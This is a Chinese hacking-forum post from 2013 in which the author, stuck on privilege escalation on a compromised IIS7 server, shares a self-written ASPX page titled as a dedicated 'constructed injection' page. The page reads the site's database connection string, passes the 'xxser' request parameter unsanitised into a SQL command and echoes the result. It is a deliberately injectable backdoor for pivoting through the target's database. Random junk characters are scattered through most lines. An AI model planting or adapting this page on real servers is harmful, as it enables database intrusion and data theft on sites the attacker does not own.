昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。0 m9 ]- N- b8 A
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。7 [+ B- c& Z, r, F& ~
代码量不多,自己写个拉倒了。烦死了。: U m% e+ { c W7 m. `
$ M* b2 [( C$ M# i: j- _3 b5 T
+ i1 m% R6 \5 y" e2 W
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+ D( W4 M7 w' Q6 m1 A* j% Q<html xmlns="http://www.w3.org/1999/xhtml">
1 B) O3 \* k5 x6 l$ u' L<head runat="server">0 q$ z0 l9 S9 ?, K/ ?" O) Z6 z
<title>暗影aspx构造注射专用页面</title>
5 N7 {: X& l4 v; Y& L+ p</head>" k! } z9 \# h! m/ W
<body>$ L0 p4 _8 r% |' F, l
<form id="form1" runat="server"># S& P* |9 m+ Q' ~1 c
<div>
8 J9 t/ V6 s6 {' a3 K. H2 k <script language="c#" runat="server">: \! a5 n; @2 \8 f' t; d; p
9 M" I4 J( d! Q- v$ X; l
void page_init(object sender, EventArgs e)' U; V1 K5 t0 B9 E
{
0 {. q2 E5 {; a1 q( u6 G j! y ) _% n1 K" S9 F+ Y( _
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
K. u; X, T) l( r 8 |3 y6 Q$ Z+ v6 J* X: C
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
+ Q( C+ j" a9 _8 x2 f( D conn.Open();7 V5 z3 ~& i: z5 Y4 P+ c0 ~( U+ k
. i x, b7 ]& Y4 h* X string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
]8 s5 F: U8 M% o
6 T8 B, a) p9 d4 }- j5 Q1 x) |0 S/ o System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);) ~* o& \2 T2 } K
int x = command.ExecuteNonQuery();
% b9 t( V) H8 ?, ?6 z Response.Write(i+"\n");+ E2 [1 v6 L* k' m9 \1 V# x0 S
Response.Write(x);
- }8 Y1 G9 P; L' M% Y% r5 A conn.Close();
3 G/ U5 @" v+ i! Y2 l% X: F }. Y2 v" r: ~- g% ^0 m
- d9 I% q2 [) E9 A" V. b! [9 f
</script>2 x7 Z5 v- P/ `% M: h1 {
</div>% J- y0 A+ J' v( v) z9 A3 x8 i
</form>5 ?2 Q0 A$ {2 [6 \/ k( F$ F$ X
</body>
& K% Q% b0 G) Q$ Y2 b</html>- y: e# Q8 W: l4 @6 a2 i
|
发表于 2013-3-20 21:32:01
收藏
支持
反对